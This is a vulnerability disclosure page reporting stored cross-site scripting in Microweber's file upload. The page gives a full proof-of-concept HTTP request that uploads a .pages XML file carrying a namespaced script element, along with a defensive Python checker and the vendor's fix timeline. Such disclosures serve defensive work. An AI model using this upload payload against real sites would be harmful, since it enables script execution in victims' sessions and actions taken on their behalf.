Cross-site scripting - Stored via upload ".pages" file in microweber/microweber

Valid

Reported on

Jul 2nd 2022


Description

In the file upload function, the server allows uploading a .pages file that contains JavaScript code, which leads to XSS.

Proof of Concept

REQUEST:

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 961
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"

xss_poc.pages
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"

0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"

1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>
-----------------------------80883503232369887683205133266--

RESPONSE:

HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:10:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:10:19 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 133

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.pages","name":"xss-poc.pages","bytes_uploaded":"961"}

Impact

This vulnerability allows arbitrary JavaScript code to be executed to perform HTTP requests, CSRF, read the content of same-origin pages, etc.
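
A server-side content check for uploads like the one above, as an added example in Python; it is not microweber's code and not the fix in the commit referenced below. It shows why a substring search for `<script` misses the prefixed `a:script` element in the PoC while a namespace-aware parse catches it; the function names and the sample bytes are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Namespaces whose elements a browser treats as live markup in an XML document.
ACTIVE_NS = {"http://www.w3.org/1999/xhtml", "http://www.w3.org/2000/svg"}
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

# Constructed sample: the PoC body from the request above, shortened.
POC = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
       b'<html><head></head><body>\n'
       b'<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>\n'
       b'<info><name><value>123</value></name></info>\n</body></html>')
BENIGN = b'<?xml version="1.0"?><info><name><value>123</value></name></info>'

def naive_scan(data: bytes) -> bool:
    """Substring check; a prefixed element such as <a:script> slips past it."""
    return b"<script" in data.lower()

def split_tag(tag: str) -> tuple[str, str]:
    """ElementTree names look like '{namespace}local'; return (namespace, local)."""
    if tag.startswith("{"):
        ns, _, local = tag[1:].partition("}")
        return ns, local
    return "", tag

def active_content(data: bytes) -> list[str]:
    """Return reasons to refuse an upload that parses as XML; [] if none found."""
    lowered = data.lower()
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        # Refuse DTDs before parsing (guard assumes an ASCII-compatible encoding).
        return ["DTD present, refused without parsing"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []  # not well-formed XML; other upload checks must cover it
    findings = []
    for el in root.iter():
        ns, local = split_tag(el.tag)
        if ns in ACTIVE_NS and local in ACTIVE_TAGS:
            findings.append(f"active element {local} in namespace {ns}")
        for attr in el.attrib:
            name = split_tag(attr)[1]
            if ns in ACTIVE_NS and name.lower().startswith("on"):
                findings.append(f"event handler attribute {name} on {local}")
    return findings

if __name__ == "__main__":
    print("naive scan flags PoC:", naive_scan(POC))
    print("namespace-aware findings:", active_content(POC))
```

Content inspection is a second layer behind the extension allowlist. Serving user files with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff`, or from a separate origin, keeps a file that slips through from running in the application's origin.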

We are processing your report and will contact the microweber team within 24 hours. (a year ago)
We have contacted a member of the microweber team and are waiting to hear back. (a year ago)
Peter Ivanov validated this vulnerability. (a year ago)
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.19 with commit 70b46e. (a year ago)
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Files.php#L1161 has been validated